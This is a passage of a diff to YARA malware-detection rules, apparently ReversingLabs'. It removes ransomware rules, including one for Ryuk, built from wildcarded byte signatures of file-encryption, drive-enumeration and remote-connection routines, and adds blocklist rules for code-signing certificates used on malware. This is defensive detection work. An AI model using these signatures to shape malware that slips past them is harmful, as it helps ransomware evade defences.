66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 8B C7 - } - $find_files_p2 = { - EB ?? 33 C0 40 2B CB 0F B6 C0 D1 F9 41 F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 - 57 53 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? 8B 85 ?? ?? ?? ?? 50 57 57 53 E8 ?? ?? - ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD - 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 8D ?? ?? ?? ?? 6A ?? 8B 41 ?? 2B 01 C1 F8 ?? 89 85 - ?? ?? ?? ?? 58 66 39 85 ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 66 39 85 ?? ?? - ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 51 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 - E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 8B 8D - ?? ?? ?? ?? 85 C0 6A ?? 58 75 ?? 8B C1 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 - ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? - 83 C4 ?? E9 - } - $encrypt_files = { - 55 8B EC 51 8B 45 ?? 53 56 57 8B F9 8B 4F ?? 89 4D ?? 3B C1 77 ?? 8B DF 83 F9 ?? 72 - ?? 8B 1F 8D 34 00 89 47 ?? 56 FF 75 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 04 1E - 8B C7 5F 5E 5B 8B E5 5D C2 ?? ?? 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 8B F0 83 CE ?? 81 - FE ?? ?? ?? ?? 76 ?? BE ?? ?? ?? ?? EB ?? 8B D1 B8 ?? ?? ?? ?? D1 EA 2B C2 3B C8 76 - ?? BE ?? ?? ?? ?? EB ?? 8D 04 0A 3B F0 0F 42 F0 8D 46 ?? 8D 0C 00 3D ?? ?? ?? ?? 76 - ?? 83 C9 ?? EB ?? 81 F9 ?? ?? ?? ?? 72 ?? 8D 41 ?? 83 CA ?? 3B C1 0F 46 C2 50 E8 ?? - ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 58 ?? 83 E3 ?? 89 43 ?? EB ?? 85 C9 74 ?? 51 E8 ?? - ?? ?? ?? 83 C4 ?? 8B D8 EB ?? 33 DB 8B 45 ?? 89 77 ?? 89 47 ?? 8D 34 00 56 FF 75 ?? - 53 E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 66 89 04 1E 8B 45 ?? 83 F8 ?? 72 ?? 8D 0C 45 ?? ?? - ?? ?? 8B 07 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 77 ?? - 8B C2 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 1F 8B C7 5F 5E 5B 8B E5 5D C2 ?? ?? E8 ?? ?? - ?? ?? E8 ?? ?? ?? ?? CC CC CC CC CC B8 ?? ?? ?? ?? C3 - } - $enum_drives_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 - 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 15 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 6A ?? 33 C0 C7 - 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? C6 - 45 ?? ?? BF ?? ?? ?? ?? 8D 45 ?? 0F A3 38 0F 83 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8D - 47 ?? 0F 43 4D ?? 66 89 01 8D 45 ?? 83 7D ?? ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 83 - F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 33 C9 C7 45 ?? ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? 66 89 4D ?? C6 45 ?? ?? 83 F8 ?? 75 ?? 6A ?? 68 ?? ?? ?? ?? EB ?? - 83 F8 ?? 75 ?? 6A ?? 68 ?? ?? ?? ?? EB ?? 83 F8 ?? 75 ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D - ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 55 ?? 56 8D 4D ?? E8 ?? ?? - ?? ?? 8B 4D ?? B8 ?? ?? ?? ?? 2B CE C6 45 ?? ?? F7 E9 83 C4 ?? C1 FA ?? 8B DA C1 EB - ?? 03 DA 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? - ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? - ?? ?? 83 C4 ?? FF 35 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 55 ?? 56 8D 4D ?? E8 ?? ?? ?? - ?? 8B 4D ?? B8 ?? ?? ?? ?? 2B CE 89 7D ?? F7 E9 83 C4 ?? 89 5D ?? C1 FA ?? 8D 4D - } - $enum_drives_p2 = { - 8B C2 C1 E8 ?? 03 C2 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? FF 75 - ?? 50 51 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B - 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 - C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 47 83 FF ?? 0F 8C ?? - ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 89 5D ?? C6 45 ?? ?? 8B 4D ?? 8B 31 - 3B F1 0F 84 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? FF 75 ?? 8B C8 C6 45 - ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F8 C6 45 ?? ?? 8B 4E ?? 89 4F ?? 8B 4E ?? 89 4F ?? 8D - 4F ?? 8B 46 ?? 89 47 ?? 8D 46 ?? 3B C8 74 ?? 83 78 ?? ?? 8B D0 72 ?? 8B 10 FF 70 ?? - 52 E8 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 57 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Kreamer Ltd" and (pe.signatures[i].serial=="00:e9:75:6b:3f:38:b1:17:2e:a8:9f:db:df:db:a5:f9:79" or pe.signatures[i].serial=="e9:75:6b:3f:38:b1:17:2e:a8:9f:db:df:db:a5:f9:79") and 1492732800<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_09Fb28 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "e7701457-c6cd-5b20-b227-8a9cdcde8213" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14786-L14802" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5ed65d33b73977e869460ba51271aff94811fa2f41e4a2993c47233add2f38dd" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ( all of ($enum_drives_p*)) and ( all of ($find_files_p*)) and ($encrypt_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "New Dial spa" and pe.signatures[i].serial=="09:fb:28" and 1046968418<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Ryuk : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_197Dc32D915458953562D2Fe78Bf2468 : INFO FILE { meta: - description = "Yara rule that detects Ryuk ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "179c9277-0bdc-522a-a822-cf93febff408" - date = "2020-07-15" - modified = "2020-07-15" + id = "9c25410f-6a3d-5e6e-b270-ccec3be34e80" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Ryuk.yara#L1-L199" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "bf93892b281be20917656e242cbb0f3b3694439556b7e5e40a424ba1aa909105" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14804-L14820" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e61284a74765592fe97b90ca1c260efa46ea31286e6d09ab32d6c664b8271f2a" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Ryuk" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - 55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? - 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 - FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? - ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? - ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 D2 89 55 ?? 0F 57 C0 66 0F 13 - 45 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8D 55 ?? 52 8B 45 - ?? 50 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ?? - ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? 83 7D ?? ?? 77 ?? 81 7D - ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 6A ?? 6A ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? - 6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 45 ?? - 89 55 ?? 83 7D ?? ?? 72 ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 76 ?? 6A ?? 6A ?? 8B 4D ?? 51 - 8B 55 ?? 52 E8 ?? ?? ?? ?? 6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 - 50 E8 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 83 7D ?? ?? 77 ?? 72 ?? 81 7D ?? ?? ?? ?? ?? 77 - ?? 83 7D ?? ?? 77 ?? 72 ?? 83 7D ?? ?? 73 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 76 ?? 83 7D ?? ?? 77 ?? 72 - ?? 81 7D ?? ?? ?? ?? ?? 73 ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 6A - ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 45 ?? 89 - 55 ?? EB ?? 83 7D ?? ?? 77 ?? 72 ?? 81 7D ?? ?? ?? ?? ?? 73 ?? 6A ?? 6A ?? 8B 55 ?? - 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? - 52 50 E8 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 83 7D ?? ?? 77 ?? 72 ?? 81 7D - } - $encrypt_files_p2 = { - 77 ?? 83 7D ?? ?? 77 ?? 72 ?? 83 7D ?? ?? 77 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? 8B 4D ?? 89 8D ?? ?? ?? ?? 8B 55 ?? 89 95 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 72 ?? - 83 7D ?? ?? 73 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D - ?? ?? 0F 84 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 77 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F - 86 ?? ?? ?? ?? 8B 4D ?? 81 E9 ?? ?? ?? ?? 89 4D ?? 6A ?? 6A ?? 8B 55 ?? 52 8B 45 ?? - 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? B8 ?? - ?? ?? ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? - 6A ?? 8D 95 ?? ?? ?? ?? 52 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? - 89 45 ?? 83 7D ?? ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? - 8B 55 ?? 83 C2 ?? 89 55 ?? 83 7D ?? ?? 0F 83 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? - ?? 8B 45 ?? 0F BE 8C 05 ?? ?? ?? ?? 83 F9 ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 0F BE 84 15 - ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 4D ?? 0F BE 94 0D ?? ?? ?? ?? 83 FA ?? 0F - 85 ?? ?? ?? ?? 8B 45 ?? 0F BE 8C 05 ?? ?? ?? ?? 83 F9 ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? - 0F BE 84 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 4D ?? 0F BE 94 0D ?? ?? ?? ?? - 83 FA ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 8D ?? - ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 66 A1 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? - 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ?? - ?? ?? ?? ?? 75 ?? 8B 45 ?? 89 45 ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? - 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8B 55 ?? 52 8B 45 ?? - 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9 - } - $encrypt_files_p3 = { - 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? - ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 55 ?? 52 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 - FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? - ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D - ?? ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 6A ?? 6A ?? 6A - ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 50 8B 45 ?? 50 FF 15 ?? ?? - ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B - 55 ?? 52 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? - 8D 45 ?? 50 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? - ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? - ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? - 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? - 51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 6A ?? - 68 ?? ?? ?? ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 6A ?? 68 - } - $encrypt_files_p4 = { - 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 45 ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? EB ?? 8B 4D ?? 83 C1 ?? 89 4D ?? 8B 55 ?? 3B 55 ?? 0F 87 ?? ?? ?? ?? C7 45 ?? ?? - ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 3B 45 ?? 75 ?? 8B 4D ?? 89 4D ?? C7 45 ?? ?? - ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 69 55 ?? ?? ?? ?? ?? 52 8B 45 ?? 50 FF 15 - ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? - ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B - 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? - ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? - ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ?? 8B 4D ?? 51 6A - ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? - 51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ?? 52 8D 45 ?? 50 8B 4D ?? - 51 6A ?? 8B 55 ?? 52 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4D ?? 51 FF - 15 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A - ?? 69 45 ?? ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? - ?? ?? ?? ?? 75 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 ?? - ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ?? - 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 55 - ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 - } - $encrypt_files_p5 = { - E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8A 0D ?? ?? ?? ?? 88 4D ?? 33 D2 89 55 - ?? 89 55 ?? 89 55 ?? 89 55 ?? 88 55 ?? 6A ?? 6A ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 - ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? - ?? 83 7D ?? ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? 33 C9 89 8D ?? ?? ?? ?? 6A ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 - 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 89 95 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? - ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 E8 ?? - ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? - ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? - 83 C4 ?? 8D 4D ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 45 ?? 50 8D 4D ?? - 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8D 45 ?? 50 E8 ?? - ?? ?? ?? 83 C4 ?? 50 8D 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? - 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 - ?? ?? ?? ?? 8D 55 ?? 52 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? - 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? - 50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? - ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 55 ?? 52 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 8B 4D - ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B - } - $encrypt_files_p6 = { - 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 8B 55 ?? - 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D - ?? 51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 81 7D ?? ?? - ?? ?? ?? 0F 86 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 D2 89 55 ?? 0F 57 C0 66 0F 13 45 - ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? - ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? - ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 8D 95 ?? ?? - ?? ?? 52 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? - 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? - ?? B8 ?? ?? ?? ?? EB ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 55 ?? - 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D - ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? B8 - ?? ?? ?? ?? 8B E5 5D C3 - } - $remote_connection = { - 55 8B EC 81 EC ?? ?? ?? ?? 8B 45 ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 45 ?? - ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 51 6A ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? - 89 45 ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? - ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8D 4D ?? 51 8B 55 ?? 52 6A ?? 6A ?? 6A ?? E8 - ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 45 ?? EB ?? 8B 4D ?? 8B 51 ?? - 89 55 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 89 45 ?? C7 45 ?? ?? ?? ?? - ?? 8B 4D ?? 8B 51 ?? 89 55 ?? EB ?? 8B 45 ?? 8B 48 ?? 89 4D ?? 83 7D ?? ?? 0F 84 ?? - ?? ?? ?? 8B 55 ?? 83 C2 ?? 89 55 ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 83 C1 ?? 51 E8 ?? - ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? B9 ?? - ?? ?? ?? 6B D1 ?? 8D 8C 15 ?? ?? ?? ?? 3B C1 74 ?? 68 